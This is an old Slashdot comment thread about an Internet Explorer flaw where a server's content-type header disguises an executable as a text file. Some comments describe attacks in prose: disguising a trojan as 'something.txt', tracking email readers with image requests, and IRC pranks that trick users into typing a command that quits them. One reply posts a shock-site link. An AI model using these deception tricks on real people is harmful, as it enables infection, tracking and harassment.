      • [Outlook] could allow only formatting, link, and image tags

      Image isn't safe. It's trivial to include a bogus image that actually references a cgi script (and passes back your email address or unique ID) to log that your account is active. I'm actually surprised that more spam doesn't do this, but I believe it won't work against AOL users, who are probably the biggest target group. ;-)

      --
      If you were blocking sigs, you wouldn't have to read this.
    10. Re:I would have agreed a week ago by baptiste · · Score: 2
      I had Mozilla do the same thing on Windows & Linux - it asked what I wanted to do with the file, but on Windows at teh exact same time, McAfee popped up a virus alert window. I just clicked 'Stop' and clicked cancel on the file save window and deleted the email - easy enough.

      One of the biggest problems I've faced is that fact that while many users now have anti-virus programs, they are not configured properly. Usuaully the AV program is just doing background scans. No download or email attachment scanning is enabled and auto update is rarely enabled. I've spent weeks ensuring that users get the programs configured for maximum protection with minimal user impact. Surprisingly enough - the users don't mind the full scan popping up minimized to run during hte day once a week along with transparent background/email scanning. Works great, except when something like Goner hits and there are no dignatures out for it yet - we got hit hard by that one (the users KNOW they shouldn't have opened the file but did anyway :) - even admitted they knew better)

      Of course my next step is to experiment with hueristics which will help protect against new stuff but the trick is ensuring the AV warnings aren't popping up all the time....

    11. Re:I would have agreed a week ago by hearingaid · · Score: 2

      Image is safe, if you don't implement http in your mail reader. Some emails wrap images in the email, and reference those.

      --

      my old sig used to be funny, but then slashcode ate it and now it's not funny anymore

    12. Re:I would have agreed a week ago by Anonymous Coward · · Score: 0

      I know its late in this thread, but you can nuke HTML support in outlook. Take a look at nohtml...

    13. Re:I would have agreed a week ago by uebernewby · · Score: 2

      One of the biggest problems I've faced is that fact that while many users now have anti-virus programs, they are not configured properly.

      Of course, if you know what you're doing, even if you run Windows, you don't *need* an AV-program except for scanning things you download off the internet (just to give you that nice, warm, fuzzy "safe" feeling - I've never had such a scan turn up anything.

      --

      News and bla for computer musicians: http://lomechanik.net/
    14. Re:I would have agreed a week ago by GTRacer · · Score: 2
      Interesting...My mom's friend recently got hit with Badtrans and a copy wound up in my mom's Juno inbox. I told her it was safe and to forward it to me. I use LookOut 2000 and IE 5.5 SP2. I also use WinNT and an Intellimouse Explorer trackball. I also use Mandrake. So what?

      Before I opened Outlook I made sure Norton was up-to-date. I had thought the IE 5.5 SP *1* patch took care of this auto-execute problem, so I wanted to see a presumably-neutered example of Badtrans. WRONGO. Apparently, it's SP2. Norton did its job however and all was safe. Except that even after patching IE to SP2, those messages in Outlook STILL auto-open in Notepad. Now they just have some Norton warning, but still, I thought I was done with auto-opens.

      Anyone know why this is still happening? And don't say "Because you're using M$, fucktard!"

      GTRacer
      - Will switch to Konq when someone tells me how to fix the fonts

      --
      Defending IP by destroying access to it? That makes sense, RIAA/MPAA. Go to the corner until you can play nice!
  104. Please, get it right by OblongPlatypus · · Score: 3, Informative

    Those of you who read the articles will consider this redundant, but I've seen so many different interpretations of how the exploit works (and many wrong ones modded up), so I thought I'd clear it up:

    You make a trojan or other malicious executable, and name it 'something.txt'. Then you make your HTTP server tell browsers that this file has content type 'application/octet-stream'. IE will read the content type header and realize that it's an executable, and ask you if you want to open it or download it. But since the file name indicates a text file, there's absolutely no indication that a program will be executed if you choose "open".

    DISCLAIMER: I haven't tried this. This is just my interpretation of what I've read in the various articles. Also note that some versions of IE will use the word "execute" instead of "open" in the pop-up dialog, which might help tip some users off.

    --
    -- If no truths are spoken then no lies can hide --
    1. Re:Please, get it right by foobar104 · · Score: 2

      Note that the opposite scenario can also occur. (I posted this same basic story under another comment, but what the hell, comments are cheap.)

      I have a CGI script that takes a filename parameter, like this:

      http://foo/bar.cgi?blah=blah&filename=quux.jpg

      When IE 6 on Win 2000 gets that URL back from the server, it ignores the "Content-type: text/html" header that the CGI script generates and instead thinks it's downloading a JPEG image. No other browser I tested does this.

      The problem can be eliminated by re-ordering the CGI parameters, like so:

      http://foo/bar.cgi?filename=quux.jpg&blah=blah

      So it seems that IE just completely mixes up the whole extension/mime-type rules, even to the point of seeing file extensions where it shouldn't (i.e., at the end of CGI URLs).

    2. Re:Please, get it right by Anonymous Coward · · Score: 0

      Thats exactly what I was about to point out.

      I have actually used this "bug" in IE before in a PHP script I wrote, I was trying to mask certain elements of the layout but still have them displayed, on occassion it can be a nice feature to be able to force mime-types.

      I actually see this "gaping hole" as more of a feature, because it allows you to, in effect, bypass the client nodes mime typing and force it to use what you TELL it.

      While it can be used for "evil" it can also be used for good....and I don't think it is deserving of such a harsh, and poorly thought out, response from the author.

    3. Re:Please, get it right by Anonymous Coward · · Score: 0

      Why don't you try to write to fucking standards rather than for an ignorant-ass browser where your crap will actually break if they ever get their shit together.

      Oh wait nevermind, this is MS, they'll just re-invent HTML and tcp/ip, 'cuz they have 30 billion in the bank and they aren't using it to actually test and fix their current product line.

    4. Re:Please, get it right by Peyna · · Score: 1

      I haven't been able to test what you said about the CGI script, but that is rather interesting. I would expect it to parse left to right, and once it hits the ".cgi?" it should know that everything following that is an argument to sent to the cgi-script. Sounds like poor parsing routines to me....

      --
      What?
    5. Re:Please, get it right by Tony-A · · Score: 1

      Yeah, you can use a bug or a hole to do good, but it will tend to be sensitive to exactly what version is being used. Taking advantage of bugs may be necessary or expedient, but expect something to break in the near future.
      Microsoft gets confused easily. For fun, try out various nonsense headers when sending an AutoDesk .dwf file back to the browser.

    6. Re:Please, get it right by foobar104 · · Score: 3, Insightful

      I think it's even worse than that. Why should a web browser parse a URL at all, except as far as the "http://" (or whatever), server name, and the rest of the URL? Everything after the third slash gets passed to the server as a "GET" request anyway, so why parse it at all?

    7. Re:Please, get it right by KjetilK · · Score: 1

      Yeah... Besides, if you use Content Negotation, which is a very useful but alas ignored feature, the only indication you will ever have as to the type of file is the MIME type...

      --
      Employee of Inrupt, Project Release Manager and Community Manager for Solid
    8. Re:Please, get it right by Peyna · · Score: 1

      I'm not exactly sure, I think I was actually thinking about it from the server side when I made that comment. The browser doesn't have too much of anything I suppose. Maybe whatever server he is using isn't correctly handling the HTTP GET/POST request or whatever.

      --
      What?
    9. Re:Please, get it right by julesh · · Score: 1
      This doesn't work.


      Because I guess a lot of script kiddies read /. and everyone else has been vague on details, I'll hold off on them as well, but the real bug involves messing around with HTTP headers. Basically, one part of IE uses one method to get the filename of an object, and another uses a different method. IE shows the '.txt' or whatever filename in its dialog boxes, but the file it saves to your hard disk and executes is a '.exe' file.

  105. How about... by madbovine9 · · Score: 1

    someone write a little web-page exploit that, say, when the webpage is opened would reboot the windows machine and display a popup message box upon the reboot, maybe with some personal information, like ip address, windows user name, something like that. This would be a very simple way to show the countless hoards of win users that their system is vulnerable. Oh, and include a comment about this is a windows only problem.

    Just my thoughts to this so-called-exploit that "people" say is a major problem. If a web page can cause my computer to reboot and pop-up a window, then this will show me that there is a definite problem.

    1. Re:How about... by Anonymous Coward · · Score: 0

      linux whore alert... go find your shepherd.

    2. Re:How about... by Anonymous Coward · · Score: 0

      Why the Hell dont YOU write such a program???!!??
      You obviously think this is a big exploit and that all IE users are dumb enough to download/run ANY executable file from the internet, so this should be a pretty simple task for you.

      Oh and while your at it, why not mention what version of Linux you run to be kewl!

      Twat

  106. Re:other browsers-IE setting? by Anonymous Coward · · Score: 0

    What percentage of 85 is 'other' browsers set to say they're IE?

  107. Journalistic integrity? by Pyromage · · Score: 1

    Whatever happened to journalistic integrity? Now I agree with the need for posting this vulnerability, but the article is horrid. It provides little information and at the same time is extremely incisive. This has to be written in the most inflammatory way possible. This is literally an embarassment. What is the point of this insanely sensationalist news? This type of treatment is not necessary, and is especially unequal. No Linux/BSD/Unix vulnerability has ever been ended with "Happy (browsing|mailreading|telnetting|etc)". Sure, it needed to be posted, but this is written in the same horrid, trigger-happy, publish-now-correct-never, lets-bash-microsoft, lets-bash-integration (kernel httpd, anyone?), insulting and riot-inciting way possible. This would never be permitted in a print journal, and is why that official recognition of internet publications that was posted today was so long in coming. If this was a television anchor saying this they would have been the butt of a massive libel lawsuit (Oprah beef suit, anyone?). But it's slashdot, so it's ok.

    This is bullshit.

    1. Re:Journalistic integrity? by Anonymous Coward · · Score: 0

      Ignorant American. You ought to look at how French journalists cover the news. It is taken for granted that the journalist will insert his opinions into the news.

      There's no such thing as unbiased news. By deciding what to cover, one is making a biased decision. Does one cover a plane crash, or fire? In either case, the victims of the neglected story will be pissed.

      By choosing specific quotes out of a 4,000 word speech, one is making a biased decision.

      Ben Franklin et al were never fans of unbiased news. They were fans of a free press.

      You apparently are not.

  108. Who does this hurt? by netdemonboberb · · Score: 1

    This hurts the people that don't know enough to not open the file. These are the same people that Microsoft is trying to make their operating system easy enough to use. Therefore, it is simple enough for beginners to use but it security is made in such a way that a beginner can have their computer taken over by a virus.

    --

    Volunteer Mozilla developer, RPI Student.
    1. Re:Who does this hurt? by Anonymous Coward · · Score: 0

      Uh, you don't seem to understand. A theoretical virus/worm exploiting this could have ANY name. You could think you're downloading an MP3 of your favorite song... if it ends in .mp3, it's just music right?

      Well, it could just as easily be a program that clears your hard drive and flashes "h4x0r3d" to your BIOS, and IE will happily execute it without asking you. ANY file you download could infect your system. Maybe even image files can be "infected" this way... you don't even have a choice about loading those. Can you say banner ads?

      Now do you see the problem?

  109. FUD by Wonko42 · · Score: 3, Insightful
    Gee, michael, could you try and work in just a little more FUD? The exploit does require user intervention in order to execute malicious code. It pops up a dialog box asking if you want to open a file. The only security issue here is the fact that the name of the file can be changed by the malicious server. But regardless of what the fake name is, if the user clicks Cancel or Save To Disk, the exploit is thwarted.

    Besides, it's not like Microsoft are the only folks who take forever to release patches.

    1. Re:FUD by scorcherer · · Score: 1
      it's not like Microsoft are the only folks who take forever to release patches.

      The article is named 'Linux FTP security flaw...' but goes on to the real point, that the flaw is in WU-FTPD. Who's FUDing now?

      By the way, is the Washington in WU as in Redmond, Washington? That could easily explain the poor security of their products.. FUD FUD FUD ;-)

      --

      --
      The Cap is nigh. Time to get a fresh new account.

    2. Re:FUD by Wonko42 · · Score: 2
      The article is named 'Linux FTP security flaw...' but goes on to the real point, that the flaw is in WU-FTPD. Who's FUDing now?

      Yes, and where in my comment did I use the word "Linux"? Are you holding me personally responsible for the contents of an off-site article that I didn't write? Do not deny it! Answer me now! I DEMAND JUSTICE!

      Cough, cough.

    3. Re:FUD by scorcherer · · Score: 1
      Yes, and where in my comment did I use the word "Linux"? Are you holding me personally responsible for the contents of an off-site article that I didn't write? Do not deny it! Answer me now! I DEMAND JUSTICE!

      No, I was trying to point out that the author of that article was FUDing about. Then I had a go at FUDing, by noting the Redmond-WU connection ;-). So the FUD just goes around in circles, in the end it does not matter that much.

      --

      --
      The Cap is nigh. Time to get a fresh new account.

    4. Re:FUD by veddermatic · · Score: 2

      Having worked in many an office where the sheep (ooops, I mean "users") don't know a thing about computers, security, operating systems, virii, or basically anything other than "When you need to make a bullet list, do this:..."

      It doesn't take ANY user intervention. If the default action in IE is to excecute code, which, by golly, it is, then 99.999999999999999 percent of windows users will execute the code.

      Users will ALWAYS hit return at a dialoge box. Windows trained them to do so. In this case it points out how shitty M$ is at UI / Security.

      C'est la Vie.

      --
      Department of Homeland Security: Removing the rights real patriots fought and died for since 2001
    5. Re:FUD by SpaceLifeForm · · Score: 1

      Except that your FUDing is FUDed up.
      The WU-FTPD was originally developed at Washington University in St. Louis,
      not at the University of Washington.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
    6. Re:FUD by kiwaiti · · Score: 1
      no, sorry, 99.99999 percent of me would definitely NOT execute it, but I am still forced to use windows (non-tech job)

      Kiwaiti

      --
      Member of the Legion Of Microsoft Haters
    7. Re:FUD by TheAwfulTruth · · Score: 2

      Any "office" that lets it's users DL files and programs through IE from external sources is guilty of criminal policy neglect. IE can be locked down in an office network environment that makes this sort of thing impossible.

      --
      Contrary to popular belief, coding is not all free blow-jobs and beer. Those things cost MONEY!
    8. Re:FUD by scorcherer · · Score: 1

      I think I have to westawt /etc/init.d/fudd (that's FUD-daemon, not Elmew)

      --

      --
      The Cap is nigh. Time to get a fresh new account.

  110. Full Disclosure debate by Schmerd · · Score: 1
    You might think that Jouko Pynnonen was just catering to Microsoft when he's refusing to release more details about how to exploit the bug, but I think he's doing the right thing. The whole goal, after all, is to make things more secure. And getting Microsoft to fix the problem, while at the same time not giving crackers the full information they need is probably the closest thing to a good security situation we can have here (aside from not having the bug in the first place of course).

    There's an excellent article by Bruce Schneier in his latest Crypto-Gram newsletter discussing the issue of Full Disclosure. I recommend taking a look at it.

    1. Re:Full Disclosure debate by Anonymous Coward · · Score: 0

      Yes but of course this was labled as pandering to MS's security through obscurity because the author seems intent on saying any venomous thing he can about MS.

    2. Re:Full Disclosure debate by Schmerd · · Score: 1
      Here's the link for the Crypto-Gram that I mentioned above:
      http://www.counterpane.com/crypto-gram-0111.html#1

      Bruce Schneier is the author of Secrets and Lies and Applied Cryptography and the inventor of Blowfish and Twofish.

    3. Re:Full Disclosure debate by Anonymous Coward · · Score: 0

      Not to mention that, according to the article linked (rather than what's stated here), Microsoft's sent him the patch to test, and they've still got a week on the somewhat-standard 30-day policy for notification of a vulnerability.

  111. Re:In related news...printing by Anonymous Coward · · Score: 0

    Do you know that opera's printing suffers from 'tiny' font. Print a web page and it is *very* small.

  112. Sometimes neither content/type nor suffix count by acroyear · · Score: 2, Interesting

    I found that out when I was trying to make a "view source" link to a .jsp file that was a soft-link to the jsp with the suffix of html. Apache sent "text/plain", as appropriate. Netscape and Mozilla viewed it just fine, just as I wanted them to.

    I.E. noticed that it looked awfully like HTML and rendered it as HTML, effectively hiding all the embedded java and jsp tags that I wanted to show.

    bastards...

    --
    "But remember, most lynch mobs aren't this nice." (H.Simpson)
    -- Joe
  113. Law students shouldn't be giving advice. by glrotate · · Score: 0

    Did you miss the ethics lecture on day one?

    You do want to get a law license right?

    1. Re:Law students shouldn't be giving advice. by xah · · Score: 0, Redundant
      Like I said, I'm a law student. I'm not qualified to give legal advice. Like I said, there are no real bug-related problems reported yet. Thus, there is no case beyond a hypothetical one.

      If anyone develops a real legal problem, they shouldn't listen to anyone except a real lawyer, and definitely not a law student. Don't assume that I know what I'm talking about.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    2. Re:Law students shouldn't be giving advice. by aozilla · · Score: 2

      Ethics 101: We are the lawyers. We make the laws. We judge the laws. We prosectute the laws. We defend from the laws. About the only place in law we don't have a monopoly is in juries, but we're working on repealing your right to a jury as we speak.

      Anyone giving free advice without going to our way overpriced schools will be prosecuted to the fullest extent of the law.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  114. IE is NOT free by ChaserPnk · · Score: 1

    Someone stated that IE is free. But its not, you see. We all do. IE comes conviniently with the following MS products:

    Windows (in all 31 flavors)
    Office
    Works
    Etc.

    Of course, by the fact that you need Windows to run all of the above products and need Windows to run IE itself, you have paid for IE. Of course, once you are hooked onto it you can get all the free refills you want from microsoft.com

    --

    "A diplomat is a man who always remembers a woman's birthday but never remembers her age." -Robert Frost
    1. Re:IE is NOT free by Anonymous Coward · · Score: 0

      And because you NEED a computer to run Linux, you have paid for that (and in consequence for all software you run) too.

  115. I don't think so... by Dave_bsr · · Score: 1

    Ok, slap me if i'm wrong, but I've had IE pop up a dialog box that says "do you want to do X, click yes or no" and it does something based on yes or no. What happened to me was, I was browsing around for emulators and roms, and I got kicked to a porn site and a million pop-ups. One of them had a grey IE yes/no dialog pop-up, which said, "do you want to download our nifty porn browser?" I said no. It apparenlty downloaded something...because when I rebooted (just to kill all 35 pop-ups) I had a new virus, and I never once hit Open File. it was a neat little bugger, every time you hit a key it would send backspace and a letter of a character string to the output. so...

    I type: "www.slashdot.com"

    and it types: "I am F%^king GAY!!!"

    I thought it was interesting that it had gotten on my computer without my knowledge...I don't open files I don't trust and maybe it was another exploit of IE, I don't know. But it got on there somehow...of course, this type of thing makes the current bug pointless, right?

    --


    Who is this Anonymous Coward character, how does he post so much, and why is he always such a whore?
    1. Re:I don't think so... by aozilla · · Score: 1

      I was browsing around for emulators and roms, and I got kicked to a porn site and a million pop-ups.

      Hehe, "browsing around for emulators and roms". I'll have to use that one when my girlfriend asks me about the porn sites in the history.

      But seriously...

      I thought it was interesting that it had gotten on my computer without my knowledge...I don't open files I don't trust and maybe it was another exploit of IE, I don't know.

      I would assume that A) the virus was already there, B) you clicked something accidently, C) it was a different exploit, or D) IHBT. IHL. HAND.

      Do you happen to know what site you were browsing at the time? I'd definately be interested in checking it out for myself. Check your history if it's something that happened recently.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  116. Consider Mozilla and Macs by MADCOWbeserk · · Score: 1, Interesting

    Although I never liked Opera's interface, Mozilla has recently become my Goto browser. The first few versions (especially the Netscape branded ones) weren't so stable or capable. But the last last 3-4 milestones have been topnotch. specially .95 with the tabbed interface. Best of all I can use it in Linux.

    It does have it shortcomings. Opera much less of a resource pig, and Konquerer is better thought out. But I rarely encounter any problems rendering pages(I did in past releases) The bonus of being open source, skinable and multi-platform clinches it.

    In a final note. I think it is obvious that Microsoft's complete disrespect for thier constumers' security and privacy needs necessitates an emigration from their products. I currently run Windows boxen for Macromedia and Adobe apps. For servers I run BSD or Linux, however I was my local Comp Usa playing on a dual -G4 OS-X box. Incredible interface, even ran Windows 2000 via virtual PC. I was impressed enough with OS-X that I almost bought it, $2500 worth. The lesson, Apple is close, Microsoft has slipped. It wouldn't take very much for Apple to gain those of us constantly jumping between Windows and Unix. Maybe a G5 that achieves a better Price/Performance ratio. How about a bare bones Mac, for those who like to build a custom box.

    Just a few thoughts I am not a Mac Zealot, but to able to dump Windows and Explorer would make me feel safer.

  117. Re:Now that this particular cat is out of the bag. by justinstreufert · · Score: 1

    Another favorite is to invite people to #2,000 or another similar channel. This causes ircii-based clients to leave all open channels.

    Also telling people to "sign the guestbook, just type /sign yournamehere" ... where /sign is short for /SIGNOFF which is an alias for /QUIT... ;)

    Justin

    --
    "Why would God give us a waist if we wasn't supposed to rest our pants on it?" - Rev. Roy McDaniels
  118. Technical Term: Fnord by Futurepower(tm) · · Score: 5, Insightful


    If the volunteers for OpenBSD can go through the software and eliminate security problems in advance, Microsoft, with 30 billion dollars in the bank, could also. Since Microsoft doesn't do this, maybe there is some reason. Maybe the U.S. government has dictated that they leave bugs in.

    Software is only an operating system if it can be trusted. If it can't be trusted, there should be some other name, like fnord. Microsoft Fnord XP.

    --
    U.S. planned to attack Afghanistan before the second WTC bombing.

    --
    Bush's education improvements were
    1. Re:Technical Term: Fnord by btellier · · Score: 1

      Enough already with the inane conspiracy theory. Brass tacks, people. First of all, let me clear up that I am a huge supporter of the open source movement and I've been an active member of the UNIX security auditing community (see my URL). But:

      1. OpenBSD is merely a kernel and several small daemons and programs. Microsoft, the company, puts out their core OS, Web servers, browsers, web publishing software, FTP daemons, telnet daemons, NetBIOS daemons, etc., etc. They have much more code to audit.

      2. OpenBSD is more secure than Windows because they don't run as many services. OBSD has had several remote root compromises in the last year, but none of them infringed on their "No remote holes in 3 years" claim because they don't run the daemons by default.

      3. Microsoft doesn't audit their software because *IT ISN'T COST EFFECTIVE YET*. Not until people demand security will MS start doing this. It hasn't happened yet.

      And finally, let's face reality: Anyone who knows what they're doing has firewalls, sniffers, IDS's and vulnerability scanners in place 24 hours a day monitoring incoming traffic to their OS's. Any government agency trying to get into any place worthwhile will be noticed and thwarted within minutes.

    2. Re:Technical Term: Fnord by Anonymous Coward · · Score: 0

      OpenBSD is more secure than Windows because they don't run as many services. OBSD has had several remote root compromises in the last year, but none of them infringed on their "No remote holes in 3 years" claim because they don't run the daemons by default.

      And how many services does a Windows machine run by default? For Windows 95/98/Me, I believe it's 1?

    3. Re:Technical Term: Fnord by poot_rootbeer · · Score: 1

      Maybe the U.S. government has dictated that they leave bugs in.

      Since when has Microsoft NOT defied governmental mandates?

  119. Just waiting for someone to... by scorcherer · · Score: 4, Funny

    post a link to the picture of 'another gaping security hole'.

    --

    --
    The Cap is nigh. Time to get a fresh new account.

    1. Re:Just waiting for someone to... by RabidChipmunk · · Score: 1

      http://goatse.cx/

      I apologize in advance.

      --
      This is not a political statement. This is not legal advice. It's a frick'n Slasdot post. However: I'm Running For
  120. Laughable by doorbot.com · · Score: 2

    From the article:
    Oy Online Solutions offered to demonstrate the flaw at a private Web site only if recipients of the demo signed an agreement not to disclose information about the exploit.

    Perhaps those same people can explain exactly how often people who might exploit such an IE deficiency also follow such laws as: DMCA, anti-piracy, anti-theft, anti-terrorism, etc.

    That's completely rediculous. That's like asking the wolf to sign an NDA before letting them loose (unmonitored, of course) in the hen house.

    On a side note, I'm still waiting for a 'leet hack that will damage my install of Windows 2000. I don't run virus scan, so I'm not "protected" in that sense. But the first HUGE stumbling block is that my user has peon rights to my own system. I fail to see how this exploit could damage my system. Sure, I might lose some files, but now I'm more attune with the (better) Unix model of users and their rights.

  121. Re:Now that this particular cat is out of the bag. by Your+Anus · · Score: 0

    Ah, you need to read the part in the EULA where you hold Microsoft harmless for any damage to your computer, even if Microsoft knew there was a problem and didn't do anything about it. And with UCITA, this would be codified in law. Doesn't that make you feel all warm and fuzzy all over?

    --

    In the USA, we like stuff watered down, like beer, television, and freedom.
  122. format.com isn't a virus. by itarget · · Score: 1

    You would hold your AV vendor responsible if a non-viral file like format.com is used through an IE vulnerability to destroy your data, but not Microsoft, because IE is free?
    The kids in your neighborhood may like to leave paper bags on your doorstep that are full of something just as free and about as pleasant.

    You actually pay for IE a little with every purchase of MS' products. The money to subsidize its development has to come from somewhere.
    They also force you to install it with windows wether you like it or not, and provide no means with which to uninstall it. That's downright obnoxious, IMHO. 98lite can take care of it, but such measures really shouldn't be neccessary in the first place.

    --

    "Where shall the word be found, where will the word resound? Not here, there is not enough silence." -T.S. Eliot
  123. How is giving advice unethical? by roystgnr · · Score: 4, Funny

    I'd really like to know. Currently my choices are:

    1. Stop thinking about this question entirely. No, really, stop thinking about it. Try really hard... whoops, I thought about it again.

    2. Believe what the law student says, unless he's contradicted by an equally plausible source.

    3. Believe the "It's legal to download ROMs if you delete them within 24 hours" type rumors that get spread around the internet by the legally ignorant.

    4. Hire a real lawyer to talk to for hundreds of dollars.

    I'm sure law school grads (including your ethics lecturer) would love option 2 to be unavailable, but I'm just not seeing a superior alternative here.

    1. Re:How is giving advice unethical? by xah · · Score: 0, Redundant
      I am a law student. Make your own judgements about what I say.

      But whatever you do, DO NOT USE WHAT I SAY AS LEGAL ADVICE. If you have a legal problem, get a lawyer.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    2. Re:How is giving advice unethical? by SkepTech · · Score: 0

      Option five, since it's pretty clear by the URL that the law student posted that he goes to Rutgers, and what his name is, is to write to his deparment head about what he's done here on Slashdot.

      Maybe he'll wish he paid attention to that ethics lecture.

    3. Re:How is giving advice unethical? by The+Bungi · · Score: 1
      But whatever you do, DO NOT USE WHAT I SAY AS LEGAL ADVICE. If you have a legal problem, get a lawyer.

      Sorry, I will now sue you. For no better reason than your post. You've damaged me. Or my data. Or my computer. Or my hamster. Or something.
      I'm sure you have at least a couple of hundred bucks in bank account(s), which you'll be more than happy to settle with instead of going to court and fighting it out. Life sux, doesn't it.

      Just what we need: a geek/h^xx0r with legal skills. I'm sure this is what Darwin was mumbling about before he died.

    4. Re:How is giving advice unethical? by autopr0n · · Score: 3, Insightful

      3. Believe the "It's legal to download ROMs if you delete them within 24 hours" type rumors that get spread around the internet by the legally ignorant.

      It's legal to download ROMs and keep them for as long as you want, mp3s or any other copyrighted content as well. What you can't do is give them to other people (so the site you nabbed it off is breaking the law, disclaimer or no)

      --
      autopr0n is like, down and stuff.
    5. Re:How is giving advice unethical? by PapaZit · · Score: 2
      It's legal to download ROMs and keep them for as long as you want, mp3s or any other copyrighted content as well.

      Uh, no.

      Last I checked, "posession of stolen property" was still a crime.

      It's PROBABLY legal to download ROMs and mp3s IF you also own the original copyrighted material. And even then, it's a little bit shaky.

      You're allowed to make backups. You can copy CDs to tape or mp3 in case the original is damaged. You could argue that downloading the mp3s from audiogalaxy was the same as ripping the CD yourself. In fact, with the new anti-ripping stuff that new CDs are using, this claim becomes easier to make. However, it's still unclear enough that you might be charged and have to make your argument for a judge.

      --
      Forward, retransmit, or republish anything I say here. Just don't misquote me.
    6. Re:How is giving advice unethical? by Anonymous Coward · · Score: 0
      Brilliant. Only, he hasn't done anything wrong. He has not offered specific legal advice to a particular client. Any individual who agreed with his musings would have to contact a lawyer, who could then advise him/her on the law.

      So go ahead and call his department head.

    7. Re:How is giving advice unethical? by aozilla · · Score: 1

      Last I checked, "posession of stolen property" was still a crime.

      Cite that. I highly doubt the law covers possession of copyrighted material. The copyrighted material is, however, evidence that you committed a crime, namely "copying copyrighted material without permission".

      Then again, if you store the mp3s on tape, or other AHRA medium, you're protected under the Audio Home Recording Act. If not you have to rely on fair use, which will probably only work if you've legally paid for a copy.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    8. Re:How is giving advice unethical? by Wakko+Warner · · Score: 2

      Options 6, of course, is to tell you to fuck off and stop wasting everyone's time with this kind of crap. Oh no!, someone gave vague and non-specific legal advice, with a disclaimer stating that if you have a real legal problem, see a lawyer. Boy, what an egregious offense. I'm sure his professors will really care when some whiny little doof calls them up and tells them what he said on slashdot.

      - A.P.

      --
      "Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
    9. Re:How is giving advice unethical? by Anonymous Coward · · Score: 0

      People get fired all the time for information they reveal on weblogs. It's a common thing now.

    10. Re:How is giving advice unethical? by WillieD · · Score: 1


      > 2. Believe what the law student says, unless he's contradicted by an equally plausible source.

      This is easily the funniest thing I've read in 4 years.

      WD

  124. One thing is clear... by Anonymous Coward · · Score: 0

    You, sire, are a moron.

  125. fast way to break MS monopoly by _avs_007 · · Score: 1

    Would be to release a "Deactivation" virus, that spreads like wildfire...

  126. Mod This Up by citizenc · · Score: 1

    Moderators, mod this up -- just because you don't agree with the post, that doesn't mean it isn't moderation-up-worthy.

    +1 Interesting

  127. Re:Now that this particular cat is out of the bag. by GiMP · · Score: 2

    Actually, linux has had security problems in the past.. and Linus needs to take some classes on Quality Assurance; I'd sooner trust microsoft to come out with a secure opensource kernel then I would Linus.

    But then again, i'd expect Linus to come out with a more secure closed source kernel then it would be likey for Microsoft to come out a secure closed source kernel :)

  128. Re:Does anyone at /. read the articles in the post by Anonymous Coward · · Score: 0

    "No wonder I don't come here anymore."

    This statement is clearly false.

  129. Re:Now that this particular cat is out of the bag. by GiMP · · Score: 2

    If software is known to be faulty, either the company licensing fixes it or they do not.. they are not required per their license to fix bugs; unless explicitly stated in their license.

    If their product is not secure; that is your fault and negligence for running it, not the developer's

    This is like saying that it is microsoft's fault that someone gets infected by a virus; when it is the user's fault for being stupid enough to trust any product made by microsoft..

  130. Simple solution... by Pollux · · Score: 2

    Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features."

    Show the "top guys" the article about Microsoft finally getting around to patching their browser. Make sure you highlight this text from the article:

    Until the patch is available from Microsoft, Pynnonen said concerned users can temporarily disable IE's ability to download files.

    Explain to them that if they want to 4) Clean up the mess, while the mess is being cleaned up, they need to stop their downloading of mysterious files off the internet.

    Try to mix in some economic terms: "Boss, in order that we may obtain greater reliability through Microsoft's web browser, Microsoft says that we need to disable part of the function of the web browser itself, aka sacrificing our productivity in order to maintain stability."

    That should get their attention.

  131. What's most disturbing... by rmckeethen · · Score: 1

    Is that no one is talking about the actual exploit in detail. Historically, BUGTRAQ has *always* had a policy of full disclosure, when did this change? According to the article:

    "A subsequent message sent to Microsoft and Bugtraq Nov. 28 described the more serious issues but was not published on Bugtraq by joint agreement between Pynnonen and the list's moderator, the security researcher said."

    Correct me if I'm wrong, but doesn't this sound like BUGTRAQ is removing messages that describe security vulnerabilities in detail? I have a hard time understanding why that's necessary and, again, it is so contrary to BUGTRAQ's usual policy as to leave me gaping in disbelief.

    Full disclosure vs. non-disclosure issues asside, it seems to me that just announcing there's a security flaw and not revealing the specifics seems worse then the security flaw itself. I mean, think about it, how how does it help if I know there's a problem but I don't know exactly what it is? How does this help me? Yeah, it's great if you want to write web articles about Yet Another Microsoft Security Flaw or you love Netscape/AOL or whatnot but saying "There's a problem but we can't tell you anything about it" it isn't going to do anything for the average user.

  132. Don't Download - huh? by Anonymous Coward · · Score: 0

    It is such BS to see that people are afraid or told not to download files from the web. The web was designed to make downloading easy! It's really sad the these MS security problems are scaring people away from useing the web for what it was freaking designed for! I'm so sick of hearing people say "well you should know not to download a file"! The whole idea was to make it easy to exchange info and files. Argh.

    1. Re:Don't Download - huh? by refactored · · Score: 1

      And microsoft's vision for the web is "only download from us or one of our big name subsidaries because you can't trust just anybody."

  133. Re:Now that this particular cat is out of the bag. by sg_oneill · · Score: 2

    The issue is not that theres a bug as such, because as as software developer I know that bugs just happen as in "That's life folks" , *but* that it's a dangerous bug and microsoft have not fixed it despite continuing to sell it.

    --
    Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
  134. Long time problem by niola · · Score: 3, Interesting

    I know from my web development experiences that this has long been a problem. In fact, recently me and a friend were contracted to make some modifications to a site built in perl. The client was an all-MS shop and did not notice that sometimes the contents of the CGI's got dumped out the screen raw. It turned out that since they all used IE, it automatically assumed the output to be HTML and rendered it, but when we used Mozilla, since no propoer MIME header was sent, the browser just rendered it as text. Kind of scary that this can go on without anyone doing something about it.

    --Jon

  135. Umm. Not really. by JMZero · · Score: 2

    Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.

    It used to be that the heavy Linux focus kept away a lot of idiots. Now everyone feels like it's supposed to be some grand open forum. It used to be a much larger percentage of users just accepted the Linux perspective (I won't call it bias) and moved on.

